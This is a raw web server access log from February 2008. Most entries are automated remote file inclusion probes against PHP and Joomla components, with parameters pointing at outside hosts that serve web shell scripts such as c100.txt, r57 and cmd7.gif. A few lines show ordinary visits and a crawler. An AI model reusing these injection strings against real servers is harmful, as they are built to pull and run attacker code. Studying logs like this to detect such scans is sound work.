217.148.95.146 - - [25/Feb/2008:07:52:26 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:52:36 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:52:37 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:52:37 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:52:42 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.94.179 - - [25/Feb/2008:07:53:28 -0800] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:53:49 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:53:50 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:53:50 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:07:53:52 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:55:08 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:55:08 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:55:09 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:56:02 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:56:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:56:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:56:30 -0800] "GET /common.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:56:31 -0800] "GET /ipblock.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:07:56:32 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:07:56:33 -0800] "GET /logs/?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:07:57:01 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.145.204.84 - - [25/Feb/2008:07:57:01 -0800] "GET /[Scriptftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.145.204.84 - - [25/Feb/2008:07:57:01 -0800] "GET /[Scriptftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:02 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:02 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:02 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:02 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:03 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:03 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [25/Feb/2008:07:58:15 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:20 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:20 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:58:21 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:58:40 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:58:40 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:58:51 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:59:07 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:59:07 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:59:16 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:59:16 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:59:16 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:59:16 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:00:12 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:00:15 -0800] "GET //Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:00:17 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:00:47 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:00:47 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:08:00:48 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:01:43 -0800] "GET /uk/index.php?wID=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:01:43 -0800] "GET /logs/uk/index.php?wID=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:08:02:58 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:08:02:58 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:08:02:58 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:03:08 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:03:09 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:08:03:09 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:08:03:18 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:08:03:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:08:03:43 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:08:03:44 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:08:03:44 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:08:03:45 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:08:03:45 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:08:03:46 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:08:04:00 -0800] "GET /modules/vWar_Account/includes/functions_common.php?vwar_root2=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
130.161.158.3 - - [25/Feb/2008:08:04:00 -0800] "GET /logs/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:04:35 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:08:05:15 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:08:05:15 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:08:05:22 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:08:05:45 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:08:05:45 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:08:05:52 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:08:06:05 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.118.104.42 - - [25/Feb/2008:08:06:22 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.118.104.42 - - [25/Feb/2008:08:06:25 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
81.193.127.94 - - [25/Feb/2008:08:07:24 -0800] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.163.242 - - [25/Feb/2008:08:08:09 -0800] "GET //administrator/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - - [25/Feb/2008:08:08:19 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.8.232.250 - warboard [25/Feb/2008:08:08:24 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
87.106.97.87 - - [25/Feb/2008:08:11:34 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.97.87 - - [25/Feb/2008:08:11:34 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.97.87 - - [25/Feb/2008:08:11:35 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:11:49 -0800] "GET /logs/access_080121.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:11:50 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:11:50 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.97.87 - - [25/Feb/2008:08:12:35 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:08:14:12 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:14:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:14:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:17:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:17:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.163.242 - - [25/Feb/2008:08:18:07 -0800] "GET /logs/access.log//administrator/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.163.242 - - [25/Feb/2008:08:18:07 -0800] "GET /logs//administrator/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:08:18:40 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:08:18:41 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:08:18:42 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
138.162.0.42 - - [25/Feb/2008:08:19:00 -0800] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.0" 200 196608 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:08:19:26 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.35 - - [25/Feb/2008:08:19:38 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:21:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
